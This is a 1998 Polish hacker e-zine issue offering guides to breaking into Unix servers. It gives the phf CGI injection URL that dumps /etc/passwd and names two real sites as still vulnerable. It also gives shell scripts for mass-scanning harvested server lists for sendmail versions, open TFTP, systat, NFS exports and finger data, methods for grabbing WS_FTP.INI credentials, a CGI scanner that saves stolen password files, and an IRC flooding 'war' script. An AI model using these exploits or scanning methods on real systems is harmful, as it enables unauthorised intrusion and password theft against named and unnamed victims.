|    |   ----    ----   |  /  |---  |---\  /---\   |\    /|   /--\   /-----
 |    |  |    |  |    |  | /   |     |   |  |       | \  / |  /    \  |
 |----|  |----|  |       |\    |--   |---/  \---\   |  \/  |  |----|  |  --\
 |    |  |    |  |    |  | \   |     |  \       |   |      |  |    |  |    |
 |    |  |    |   ----   |  \  |---  |   \  \---/   |      |  |    |  \----/

=============================================================================
Numer:03 z czerwca 1998                         http://www.kki.net.pl/hackers
=============================================================================
Spis tresci:
  1.Spis tresci
  2.Wstep
  3.Hacker Start
  4.Zdobywanie wielu kont.
  5.Skrypt!
  6.Unix - polecenia cz.2
  7.Linki do ciekawych stron
  8.Redakcja

-----------------------------------------------------------------------------
Wstep:
Cos jakos tak ten mag wychodzi co 2 miesiace, choc powinien co miesiac. Do
tego numeru dolacze program opisywany w poprzednim numerze - "Kaboom!" .
Cos sie z nasza strona www dzieje, moze nawet za pol roku bedzie mozna uznac
ja za skonczona :) . W tym numerze bedzie duzo o UNIX-ie.
Kontakt przez email: hackers@kki.net.pl
            
                                             Richgyver

ps. Napiszcie czy wolicie wersje tekstowa czy html-owska wersje maga!

-----------------------------------------------------------------------------
"Hacker Start":
Opisze tutaj dosc znany sposob wyciagniecia pliku passwd z katalogu etc w 
systemach UNIX przez przegladarke internetowa z serverow podlaczonych do
internetu. Znajdujemy jakis serwer (komputer podlaczony bezposrednio do
internetu) a nastepnie wpisujemy w pole adresu:

   http://xxxx.xxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

          ^^^^^^^^^^^^^
         tu adres servera

W tedy w przegladarce pojawi nam sie caly plik passwd, gdzie sa zapisane 
hasla wszystkich uzytkownikow danego systemu. Oczywiscie sa one zaszyfrowane.
Rozszyfrowac je mozna programikiem o nazwie "Cracker Jack".
Ta metoda dziala juz na bardzo niewielu serwerach unixowych. W polsce ta
metoda dziala na:

http://www.radio.opole.com.pl
http://www.perytnet.pl

                                             Richgyver

-----------------------------------------------------------------------------
ZDOBYWANIE WIELU KONT:

czesc 1: Tworzenie listy serwerow i wstepne zbieranie informacji...

Zaczne od tego, ze pisze ten artykul tylko po to, aby inni uzytkownicy
wiedzieli, ze mozliwe jest latwe zdobycie ich konta UNIXowego.
=============================================================================
   OK., jest to pierwsza czesc mojego artykulu na temat hackowania
   kont UNIXowych, wiec chcialbym napisac co wogole bedzie mozna
   tu znalezc. Wiec tak, zamierzam opisac metody zdobywania adresow
   serwerow i wyszukiwania tych slabo zabezpieczonych, dalej metody
   chodzenia wokol systemu, zdobywania informacji o jego slabych
   punktach, ktore mozna wykorzystac do wlamania. Nastepnie kilka
   metod dostania sie do takiego serwera. Czytanie pliku /etc/shadow
   z poziomu "szarego" uzytkownika, zdobywanie dalszych kont po
   wlamaniu sie na serwer ( konie trojanskie, poszukiwanie bledow
   w konfiguracji, itp. ). Moze bedzie cos jeszcze
   ( jesli mnie natchnie, lub znajde cos ciekawego w sieci :)
============================================================================
   To zaczynam:
   Najlatwiejszym sposobem wlamania sie do systemu jest wyszukanie
   sobie kilku najslabiej zabezpieczonych serwerow i testowanie
   roznych metod wlasnie na nich. Jest to tez chyba najbezpieczniejsze,
   gdyz zakladam, ze skoro serwer jest slabo zabezpieczony, to jest
   rowniez slabo monitorowany, co daje nam rowniez wieksze bezpieczenstwo.
   Jak wyszukac sobie takie serwery? Otoz jest to bardzo proste.
   Podam tu dwie najprostsze chyba metody:

1. Uruchamiamy wyszukiwarke internetowa ( np. www.wow.pl ),
   wybieramy interesujacy nas dzial serwerow ( polecam edukacja/
   szkoly, uczelnie, organizacje studenckie i tym podobny
   shit :) Gdy pojawi sie spis serwerow zapisujemy go na dysk.
   Kiedys wszystkie dzialy WOWa byly na plytce WWW ( np.
   "WWW" sierpien 1997, mozna wiec zrobic to off-line oszczedzajac
   kase ). Dalej wycinamy adresy serwerow ( recznie lub przy
   uzyciu jakiegos programiku np. UrlCut, ktory dolaczam [ jest
   to wersja 0.01 napisana w 15 min., wiec posiada duzo bledow,
   ale obiecuje je wkrotce poprawic ] ). Majac juz liste serwerow
   ( jeden pod drugim ) mozemy rozpoczac scanning...

2. Druga metoda to sciagniecie gotowej listy serwerow z:
		ftp.rs.internic.net
   ( sa tam: com.zone.gz, edu.zone.gz, gov.zone.gz, org.zone.gz,
   root.zone.gz i inne ). Polecam edu lub org, jako najslabiej
   zabezpieczone. Odradzam natomiast "zabawe" z gov.zone.gz
   ( szczegolnie poczatkujacym hackerom ). Po zrzuceniu pliki
   te nalezy rozpakowac ( $ gzip -d edu.zone.gz lub pod WIN95
   WinZip 6.3 [ moze inne tez] ). Dalej znow trzeba recznie
   odzielic adresy od reszty danych ( mozna uzyc programiku
   getdomain napisanego w perlu [ uruchamiamy go:

$ perl getdomain.pl edu.zone edu>lista ,lub dla org
$ perl getdomain.pl org.zone org>lista i analogicznie inne ]).

   W najblizszym czasie postaram sie napisac podobne narzedzie
   pod DOSa.

3. Mozna tez wykorzystac liste serwerow, ktora dodaje do 
   artykulow jest ona uzyskana wlasnie z WOW i obrobiona
   programikiem UrlCut.
   Dobra mamy juz liste serwerow. Teraz nalezaloby oddzielic
   ziarna od plew. Zaczynamy od wstepnego przejrzenia podstawowych
   dziur... 
   W tej czesci podam jedynie jak zdobywac rozne dane,
   w czesci nastepnej postaram sie przedstawic wam ich analize
   i doczego moga nam sie przydac zdobyte informacje.

a) SENDMAIL:
Zacznijmy moze od sprawdzenia wersji sendmaila na serwerze.

$ telnet adres.serwera.ofiary 25

   powinno pojawic sie cos takiego:
   ...adres.serwera.edu.pl Sendmail 8.6.12/8.6.12 ready at...
   Aby zrobic to automatycznie mozna uzyc programu SMSCAN,
   uruchamiajac go ze stworzona wczesniej lista serwerow
   ( najpierw kompilujemy i zamieniamy nazwe :)

$ gcc smscan.c
$ mv a.out SMSCAN
   
   i uruchamiamy:

$ ./SMSCAN lista>plik.z.wersjami.sendmaili&

   Trwa to dosc dlugo, wiec najlepiej robic to albo noca,
   albo polaczyc sie z jakims serwerem udostepniajacym
   konta UNIXowe zrzucic tam SMSCAN i liste serwerow do
   sprawdzenia a po uruchomieniu ( zostawic proces w tle
   & lub nohup  ) i wylogowac sie. Wyniki
   mozna obejrzec wtedy np. nastepnego dnia.
   Spisujemy numery wersji Sendmail'i ( potem nam sie przydadza ).

b) TFTP ( Trivial File Transfer Protocol ).
Sprawdzamy, czy serwery maja zaistalowanego klienta tftp:

$ telnet adres.serwera.ofiary 69

  Jesli sie polaczy - notujemy to sobie, jesli nie - szukamy dalej.
  Dzis juz bardzo trudno znalezc serwer odpowiadajacy na
  takie zawolanie. Najczesciej zobaczycie napis:
  
  telnet: Unable to connect to remote host: Connection refused

  Mozna tez napisac script, ktory bedzie to robil za nas.
  W najprostszej formie wygladalby tak:

$ cat script.tftp

telnet www.adres1.edu.pl 69
telnet www.adres2.edu.pl 69
telnet www.adres3.edu.pl 69

  Tak robilem na poczatku, gdy jeszcze nie umialem napisac
  bardziej skomplikowanego, lecz uniwersalnego scriptu.
  Teraz wyglada on w ten sposob:

$ cat script.tftp

#!/bin/sh

for serwer in `cat $1`
do
  telnet $serwer 69
done

$ :)

  Uruchamiamy:
$ ./script.tftp lista.serwerow>raport.tftp

  Przegladajac 'raport.tftp' wyszukujemy z jakimi serwerami polaczenie 
  sie powiodlo. Notujemy to sobie.

c) SYSTAT i NETSTAT.
  Wykonujemy te same czynnosci, co powyzej, lecz zamiast portu 69
  odpowiadajacego za TFTP podajemy 11 (systat) a nastepnie 
  15 (netstat). Sprawdzamy czy otrzymujemy odpowiedz z serwera
  ( czy porty te sa aktywne ). Jesli tak:

$ telnet www.adres.serwera 11>raport.systat&

  Powinienes otrzymac liste procesow na serwerze ( tak jakbys wydal komende
  ps -auwwx ), nie majac nawet na nim konta.

$ telnet www.adres.serwera 15>raport.netstat&

  Zwroci Ci liste aktywnych portow serwera.

d) NFS, czyli Network File System.
  Jest to chyba najfajniejsza rzecz jaka wymyslono. Admini ciagle
  maja problemy z konfiguracja pliku /etc/exports.
  Tworzymy wiec podobny script, z tym, ze zamiast telnetu wpisujemy
  " showmount -e ".

----- wytnij tu ------
#!/bin/sh

for serwer in `cat $1`
do
  showmount -e $serwer
done
----- wytnij tu ------

 Na wiekszosci systemow potrzeba do tego roota.

# script.mount lista.serwerow>raport.mount&

  Jednak juz w Red Hat Linux 5.00 moze to zrobic kazdy uzytkownik
  ( a taki system jest wlasnie na dom.vr.pl, gdzie mozna sobie
  zalozyc darmowe konto ).

% script.mount lista.serwerow>raport.mount&			;)


e) FINGER.
  Jest to rowniez bardzo pozyteczne narzedzie. Szczegolnie w wydaniu:

$ finger -l @www.adres.serwera

  Zwroci nam to dane na temat pracujacych w systemie uzytkownikow.
  Przydatne jest to szczegolnie przy probie dostania sie do
  systemu poprzez odgadniecie hasla.
  Znow tworzymy script, aby miec te informacje uwiecznione ( do pozniejszej
  analizy ).

f) WWWBOARD.
  O wwwboard bedzie wlasciwie pozniej, ale warto jest sie zorientowac,
  czy serwer udostepnia takie uslugi ;)

$ lynx

  Teraz naciskamy liere "g" i wpisujemy adres serwera:

URL to open: http://www.adres.serwera/wwwboard/wwwboard.html

  Jesli odnajdzie szukana strone, notujemy. Nie - szukamy dalej.
  [ Na temat hackowania wwwboard'a napisze w kolejnych czesciach
    artykulu ]

g) WS_FTP.
  Bardzo trudno jest dzis znalezc plik WS_FTP.INI z aktualnym
  wpisem, ale jesli Ci sie to uda to koniecznie zapisz to sobie.
  Jak go znalezc?
  Najlepiej polaczyc sie z serwerem za pomoca anonimowego ftp
  i szukac :) Gdy znajdziemy, to:

ftp> get WS_FTP.INI

  [ Szerzej na temat WS_FTP napisze w dalszych czesciach artykulu ]

h) Dziury w scriptach CGI-BIN w starszych HTTPD.
  Pod katem tego typu dziur mozna przeszukiwac serwery wykorzystujac
  program ( a raczej kilka scriptow ) XENOLITH i wczesniej
  stworzona liste. Do artykulu zalaczam script z tego pakietu o
  nazwie monk.sh
  
  Uzycie:

$ ./monk.sh lista.serwerow

  Podczas skanowania tworzy on pliki o nazwie powstalej z adresu
  serwera, w ktorych zapisuje sciagniety plik z haslami
  ( pod warunkiem, ze go sciagnie, co dzis nie jest juz takie proste :(  
  W celu przeskanowania pojedynczego serwera korzystam ze swietnego
  programiku o nazwie Vito. Dolacze go do nastepnego artykulu, w ktorym
  dokladniej opisze te dziury. 
=============================================================================
OK. tyle na dzisiaj. Wiecej w nastepnym numerze, w ktorym postaram
sie wytlumaczyc wam w jaki sposob interpretowac zdobyte informacje,
oraz jak z nich korzystac.
=============================================================================

                                                             ArktH

ps.     Pozdrowienia dla: KeenU'a, Sir D, BoBo, 3stan'a i pozostalych.
	" Nil mortalibus ardui (e)st... " - Horacy
        mail: arkth@friko4.onet.pl
        flames: /dev/null

-----------------------------------------------------------------------------
Skrypt!:
Jak to mawia│ kiedy£ pan Japa WITKA (kto nie rozumie to nie zrozumie).W 
ka┐dym b╣dƒ razie to znowu JA. Hmmm znowu kazali mi cos napisaµ ale nie 
powiedzieli co. Uwazam ze ka┐dy z was ma mIRC-a (internet realy chat) ale 
je£li nie to za│╣czam go tutaj. Jego instalacja jest banalna wiec nie bΩdΩ 
jej opisywal. Mo┐e nie raz bΩd╣c na ircu us│yszeli£cie cos o skryptach czy 
to wojennych obronnych czy mo┐e uniwersalnych. W│a£nie to o nich chce 
powiedzieµ co nieco. Niekt≤rych stron mo┐ecie £ci╣gn╣µ jakiego£ scrypta np.
http://www.7thsphere.com/sphere/files/sphere.exe  i jest on jednym z lepszych
scryptow wojennych. Jest on w pliku zip lub wersji instalacyjnej. Po 
£ci╣gniΩciu rozpakujcie go do katalogu w kt≤rym macie zainstalowanego Mirca.
Po w│╣czeniu mo┐e pojawiµ siΩ k│opot z setupem. Wpiszcie co tam chc╣ a je£li
bΩdziecie mieli k│opocik to po prostu trzeba wcisn╣µ cancel. I w│a£ciwie to 
wszystko je£li chodzi o instalacje. Po w│╣czeniu musicie od pocz╣tku wpisaµ
swoje dane i kana│ ircowy. Zaraz po po│╣czeniu zobaczycie zmiany. Po 
pierwsze pojawi│y siΩ dƒwiΩki. Wszystko wy£wietlane jest w oknach. W pasku 
opcji pojawi│a siΩ nowa 7sphere. Jest tam wiele opcji m.in. mo┐na ustawiµ 
sobie ochronΩ r≤┐nego rodzaju np. przed floodem. Mo┐emy zapisywaµ logi by 
potem sobie poczytaµ lub sprawdziµ co kto m≤wi│. Wa┐n╣ opcj╣ jest przej£cie 
do War Menu. Mamy wtedy dostΩp do kilku program≤w do banowania, floodowania 
i r≤┐nych takich:):):):):)(r)Du┐o opcji jest dostΩpnych dopiero gdy mamy opa
(operator kana│u).  

                                                 Lukas

-----------------------------------------------------------------------------
Unix - polecenia czesc II :

Zdobywanie informacji o innych u┐ytkownikach:
-Sprawdƒ co u┐ytkownik robi               - w "nazwa_u┐ytkownika"
-Sprawdƒ co u┐ytkownik ostatnio robi│     - lastcomm "nazwa_uzytkownika" 
-Sprawdƒ porΩ zalogowania siΩ/wylogowania - last "nazwa_u┐ytkownika"
-Wy£wietlanie praw dostΩpu w katalogu macierzystym u┐ytkownika     
                                          - ls -ld ~"nazwa u┐ytkownika"

Prawa dostΩpu do plik≤w i katalog≤w w UNIX:
-Sprawdƒ prawa dostΩpu do pliku           - ls -l nazwa_pliku
-Sprawdƒ prawa dostΩpu do katalogu        - ls -ld nazwa_pliku
-Sprawdƒ prawa dostΩpu w swoim katalogu macierzystym 
                                          - ls -ld ~"twoja_nazwa_u┐ytkownika"

Prawa dostΩpu (lewa czΩ£µ wykazu) bΩd╣ podane nastΩpuj╣co:

   -rxw-------- 2 aaron           512 Feb 17 08:14 nazwa_pliku

gdzie symbole maj╣ nastΩpuj╣ce znaczenie:
d              - katalog                     
rwx (pierwsze) - prawa dostΩpu dla u┐ytkownika (Ciebie)  
rwx (drugie)   - prawa dostΩpu dla cz│onk≤w twojej grupy     
rwx (trzecie)  - prawa dostΩpu dla innych (pozosta│ych)

w ka┐dej kategorii -u┐ytkownik cz│onkowie_grupy inni 

                              Symbol oznacza:
R - zezwolenie na odczyt (kopiowanie, wy£wietlanie, £ci╣ganie)
W - zezwolenie na zapis (zmiana nazwy, modyfikowanie, kasowanie)
X - zezwolenie na uruchomienie pliku
- - brak danego zezwolenia

Prawa dostΩpu mo┐esz zmieniµ poleceniem CHMOD. Trzeba w nim wskazaµ kategoriΩ
(u- u┐ytkownik, g- cz│onkowie grupy, o- inni,) oraz kt≤re zezwolenie (rwx) 
ma byµ w│╣czone (+) lub wy│╣czone (-) Parametry mog╣ byµ kombinowane np.

Chmod o-rw nazwa_uzytkownika -  wy│╣czy zezwolenie na zapis i na odczyt dla
                                innych
Chmod u+x nazwa_uzytkownika  -  w│╣czy zezwolenie na uruchamianie dla 
                                u┐ytkownika

                                                 Lukas

-----------------------------------------------------------------------------
Linki do interesujacycg stron:
-strony zwiazane z h/p/c/v/a
 -http://www.kki.net.pl/hackers
 -http://www.inet.com.pl/rafal
 -http://hack.netpol.pl
 -http://kki.net.pl/glider
 -http://www.kki.net.pl/~masher

Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:

1. Umiescic ten "kawalek" kodu html na swojej stronie:

<-- Poczatek odnosnika do hackersmag -->
<-- Koniec odnosnika --> 2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja o adresie twojej strony. Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym spisie najciekawszych stron. ----------------------------------------------------------------------------- W sklad redakcja tego maga wchodza: -Richgyver (hackers@kki.net.pl) -Lukas (chopin@friko.onet.pl) -ArtktH (arkth@friko4.onet.pl) Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo) lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie (pieniadze). Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu mozesz sciagnac ze strony: http://www.kki.net.pl/hackers Mozesz do nas napisac list, nasz email: hackers@kki.net.pl Wszystkie materialy i informacje zawarte sa tu jedynie w celach *EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za zle wykorzystanie podanych tu informacji... /Koniec pliku tekstowego./